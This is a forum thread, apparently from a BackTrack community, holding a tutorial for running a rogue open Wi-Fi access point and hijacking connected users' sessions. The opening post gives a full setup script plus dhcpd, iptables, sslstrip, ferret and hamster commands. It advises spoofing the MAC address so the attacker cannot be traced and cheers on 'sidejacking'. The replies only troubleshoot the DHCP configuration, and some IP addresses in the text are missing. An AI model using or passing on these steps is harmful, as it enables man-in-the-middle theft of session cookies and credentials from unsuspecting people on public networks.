Results 1 to 3 of 3

Thread: How to Sidejack Secure Sessions using a Rogue AP, ssl strip, ferret and hamster

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010

    Default How to Sidejack Secure Sessions using a Rogue AP, ssl strip, ferret and hamster

    First off, this is a tutorial based on fifo_thekid's information. So hats off to your, sir.

    OK. What were going to be doing is setting up a rogue access point and side-jacking session cookies using ferret and hamster. Here's what you will need:
    dhcp3-server (with custom dhcpd.conf file)
    2 Network Interfaces (1 wired + 1 Wireless or 2 Wireless. One of the wireless interfaces needs to be capable of monitoring.)

    All of these are built in to BT4PF, with the exception of and (obviously) the custom dhcp conf file and network interfaces. Go to your /pentest/wireless directory and create a new file called and fill it in as follows:

    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    echo -n "Enter your wireless interface MAC(XX:XX:XX:XX:XX:XX) [Optional,]: "
    read -e MAC
    echo -n "Enter the channel you would like your rogue AP to be called [Optional]: "
    read -e CHAN
    killall -9 dhcpcd dhcpd3 airbase-ng ettercap
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    modprobe tun &
    cmd="konsole -e airbase-ng -e ""$ESSID"" -P -C 30 -v "
    if [ -n "$CHAN" ]; then
    cmd=$cmd"-c "$CHAN" "
    if [ -n "$MAC" ]; then
    cmd=$cmd"-a "$MAC" "
    $cmd &
    echo "Witing 10 seconds for the SoftAP to be established"
    sleep 10
    echo "SoftAP should be working now"
    ifconfig at0 up
    ifconfig at0 netmask
    ifconfig at0 mtu 1400
    route add -net netmask gw
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    rm /var/run/
    touch /var/run/
    chgrp dhcpd /var/run/
    chown dhcpd /var/run/
    konsole -e dhcpd3 -d -f -cf /etc/dhcpd.conf at0 &
    konsole -e ettercap -T -p -q -i at0 // // &
    echo "Witing 8 seconds for portforwarding and DHCP server"
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward
    echo "Portforwarding and DHCP should be working now"
    Credit for this goes to fifo_thekid, because its his script!

    Once you have done that, open a Konsole and type:
    chmod +x /pentest/wireless/
    so we can use it accordingly.

    Lets get started.

    First off, we need to make some changes to the DHCP files. I'll be showing my examples with vim. If you want to use a different editor, more power to you. So the first thing:

    vim /etc/default/dhcp3-server

    Down at the very bottom, you will see something that says:
    Even if there is something filled in between the quotes, that's ok, because we're going to be changing it anyway. change it to:
    This will come into play later.

    Now, we need to change our dhcp.conf file to hand out IPs the way we want it to. So open a console and go to /etc/dhcp3. We Of course want to back up our current dhcpd.conf file to something like dhcpd.conf.old or something like that. Now create a dhcpd.conf file that looks like this:

    option domain-name-servers;
    default-lease-time 60;
    max-lease-time 72;
    ddns-update-style none;
    log-facility local7;
    subnet netmask {
     option routers;
     option domain-name-servers
    This will allow our Rogue AP to hand out IPs using

    Now open a Konsole and type:
    You will be prompted for some information:

    1. Internet interface. Whatever interface connects to the internet, input that.
    2. Wireless interface. Whichever wireless interface is capable of monitoring, input that.
    3. ESSID. Input the name of the Rogue ESSID you want the fake AP to put out.
    4. Wireless Interface MAC (butt covering). Input a fake mac here if desired. If you dont, it will use the mac of the wireless adapter, which would make it very easy to trace back to you. This is optional.
    5. Channel Output. Whatever channel you want the fake AP to put out. Also optional.

    Some other windows will pop up after a number of seconds. LEAVE THEM ALL RUNNING! these are starting the rogue AP info.

    Once they finish, open a new shell and type:
    sslstrip -p
    This is going to start ssl strip so that we can view secure sessions as necessary.

    Open another shell and type:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    This is going to route all http web traffic through port 10000. Because were using sslstrip, ALL traffic, even https, will go through this port.

    In the same shell, type:
    service dhcp3-server start
    Although the script tries to start DHCP, it doesn't work because it has to create the interface first, so we have to start it manually.

    Still in the same shell, type:
    /pentest/exploits/ferret/bin/ferret -i at0
    this starts monitoring on the Rogue DHCP service. Leave this running.

    In a new shell, type:
    This is going to start the hamster sidejacking tool to keep an eye on session cookies.

    Now, open up Konqueror. We need to route it through our local hamster proxy to view traffic, so go to Settings > Configure Konqueror and choose Proxy on the left. Pick Manually Specify and route it through on port 1234.

    What you have accomplished now is creating a Rogue AP that people will see when they scan for wireless networks. It shows up as an open network. Once they connect to said network, you capture all traffic using your BackTrack machine before traffic reaches your internet connection. In other words, this is a very sneaky man-in-the-middle attack.

    Now, go to http-colon-slash-slash-hamster in Konqueror and watch for traffic and available sessions. When cookies are captured, the host will show up on the right. Click on the host link to view sessions.

    Happy Sidejacking!

  2. #2
    Just burned his ISO
    Join Date
    Nov 2009


    I nearly got it working.
    When i connect with a host to the Rogue AP i keep getting the error: recv failed: connection reset by peer.

    There also seems to be an error in your dhcp code:

    subnet netmask {
     option routers;
     option domain-name-servers
    This kept giving me error's so i added a semicolon and removed the last ip address :

    subnet netmask {
     option routers;
     option domain-name-servers;

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010


    Strange. The exact configuration the way it is written originally worked fine for me, without the semicolon and both DNS servers.

    I will say, though, that getting the dhcpd.conf file right was the most annoying part of setting the whole thing up, so it may change on an adapter to adapter basis. I'll have to look into that. Thanks for the tip, though.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts